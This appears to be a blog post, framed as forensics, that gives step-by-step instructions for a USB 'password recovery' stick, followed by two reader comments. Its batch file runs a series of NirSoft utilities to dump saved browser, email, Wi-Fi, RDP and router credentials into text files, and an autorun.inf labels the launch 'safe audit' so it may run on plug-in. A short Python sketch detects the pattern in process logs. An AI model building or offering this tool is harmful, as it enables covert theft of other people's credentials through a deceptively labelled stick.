forensics – password recovery gerasimos style

Idea came from gerasimos, respect as always.

http://securityhorror.blogspot.se/2012/04/trojana-zing-usb-sticks.html

Windows XP

1. Open Notepad and copy the lines below, starting from the first "start".

start ChromePass.exe /stext \Info\ChromePass.txt
start Dialupass.exe /stext \Info\Dialupass.txt
start iepv.exe /stext \Info\iepv.txt
start mspass.exe /stext \Info\mspass.txt
start netpass.exe /stext \Info\netpass.txt
start OperaPassView.exe /stext \Info\OperaPassView.txt
start PasswordFox.exe /stext \Info\PasswordFox.txt
start rdpv.exe /stext \Info\rdpv.txt
start WirelessKeyView.exe /stext \Info\WirelessKeyView.txt
start IECacheView.exe /stext \Info\IECacheView.txt
start mailpv.exe /stext \Info\mailpv.txt
start RouterPassView.exe /stext \Info\RouterPassView.txt
start empv.exe /stext \Info\empv.txt
start iehv.exe /stext \Info\iehv.txt
start MozillaHistoryView.exe /stext \Info\MozillaHistoryView.txt
start WebBrowserPassView.exe /stext \Info\WebBrowserPassView.txt

2. Save as:

File name:   launch.bat

Save as type:   All Files

Click Save.

3. Place the file on a blank USB stick.

4. Go to www.nirsoft.net/utils and download all the .exe files listed above.

5. Unzip the files and save the .exe files to the same USB stick as the launch.bat file.

6. Create a new folder on the USB stick and call it Info.

7. Double-click launch.bat and then open the Info folder. You should see .txt files: open and read!

Optional, not required: attempt to make it auto-run.

1. Create an autorun file called autorun.inf: open a new Notepad window and copy in the lines below.

[autorun]

open=launch.bat

Action = safe audit

2. Save as autorun.inf.

3. When you plug the USB stick in, it should pop up with the option to run "safe audit", or it may just run!
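From the defender's side, the launcher above leaves a distinctive trace in process-creation logs: several different executables started with /stext in a row. The Python sketch below is an added example, not part of the original post; the record shape (host, command line), the host names and the threshold of three tools are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Matches "<tool>.exe /stext <output file>", the export switch used in launch.bat.
STEXT_RE = re.compile(r'(?i)([\w.-]+\.exe)"?\s+/stext\s+"?([^"\r\n]+?)"?\s*$')

def find_stext_exports(events):
    """Return (host, tool, output_path) for every command line using /stext."""
    hits = []
    for host, cmdline in events:
        m = STEXT_RE.search(cmdline)
        if m:
            hits.append((host, m.group(1).lower(), m.group(2)))
    return hits

def hosts_with_burst(events, min_tools=3):
    """Hosts where several distinct tools exported with /stext (batch-launcher pattern).

    min_tools is an assumed threshold; tune it to your environment.
    """
    tools = defaultdict(set)
    for host, tool, _ in find_stext_exports(events):
        tools[host].add(tool)
    return {h: sorted(t) for h, t in tools.items() if len(t) >= min_tools}

# Constructed sample process-creation records: (hostname, command line).
SAMPLE_EVENTS = [
    ("WS-01", r"E:\ChromePass.exe /stext \Info\ChromePass.txt"),
    ("WS-01", r"E:\iepv.exe /stext \Info\iepv.txt"),
    ("WS-01", r'"E:\WirelessKeyView.exe" /stext "\Info\WirelessKeyView.txt"'),
    ("WS-01", r"C:\Windows\System32\notepad.exe C:\notes\stext.txt"),
    ("WS-02", r"C:\Tools\mailpv.exe /stext C:\audit\mailpv.txt"),
    ("WS-02", r"C:\Windows\System32\cmd.exe /c dir"),
]

if __name__ == "__main__":
    for host, tool, out in find_stext_exports(SAMPLE_EVENTS):
        print(f"{host}: {tool} -> {out}")
    print("burst hosts:", hosts_with_burst(SAMPLE_EVENTS))
```

A single /stext export (WS-02 here) can be a legitimate admin action; the burst from one host is the stronger signal.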

MyExploitHQ

2 thoughts on “forensics – password recovery gerasimos style”

  1. It could be that I’m doing something wrong, but I followed all the steps (all but the autorun thing, since it doesn’t work with USB drives on Win 7). So instead of creating a txt file, the program (WebBrowserPassView e.g.) opens and stays open. After closing, the only thing that is new in my USB drive directory is a .cfg file from WebBrowserPassView.
    Looks like the /stext function isn’t handed over to the program.

    Is there a new way to do it or am I just doing something wrong?

    1. Oh, this was tested years ago on a Windows XP machine, which I suspect was logged in with an account with system rights. Right-click and run the .bat file as admin. Also, this will trigger AV, as NirSoft apps are listed under AV signatures. It was originally just made to see if it could be done.
